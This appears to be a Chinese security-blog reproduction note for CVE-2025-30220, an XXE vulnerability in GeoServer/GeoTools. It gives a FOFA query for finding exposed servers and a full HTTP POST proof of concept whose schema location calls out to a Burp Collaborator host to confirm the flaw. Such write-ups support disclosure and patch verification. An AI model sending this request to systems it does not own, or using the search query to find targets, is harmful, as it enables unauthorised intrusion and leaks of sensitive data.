共计 808 个字符,预计需要花费 3 分钟才能阅读完成。
漏洞介绍
GeoServer是一个功能齐全,遵循OGC开放标准的开源WFS-T和WMS服务器。CVE-2025-30220 中,攻击者可构造恶意请求触发XXE漏洞,造成敏感信息泄漏。漏洞根源在于Geotools,因此 GeoServer与GeoNetwork 均受影响。
CVE编号:CVE-2025-30220
CNNVD编号:
CNVD编号:
搜索引擎
FOFA:
app="GeoServer"漏洞复现
漏洞链接:http://xx.xx.xx.xx/geoserver/wfs
POC
POST /geoserver/wfs HTTP/1.1
User-Agent: Mozilla/5.0 (Fedora; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xx.x.xx.xx
Content-Type: application/xml
Content-Length: 362
<wfs:GetFeature service="WFS" version="1.0.0"
xmlns:wfs="http://www.opengis.net/wfs"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:topp="http://www.openplans.org/topp"
xsi:schemaLocation="http://a http://7qye34hq8kudva9jd2aitm6prgx8lx.burpcollaborator.net/xxe.xsd"
outputFormat="KML">
<wfs:Query typeName="topp:states"/>
</wfs:GetFeature>
dnslog平台收到访问记录
正文完
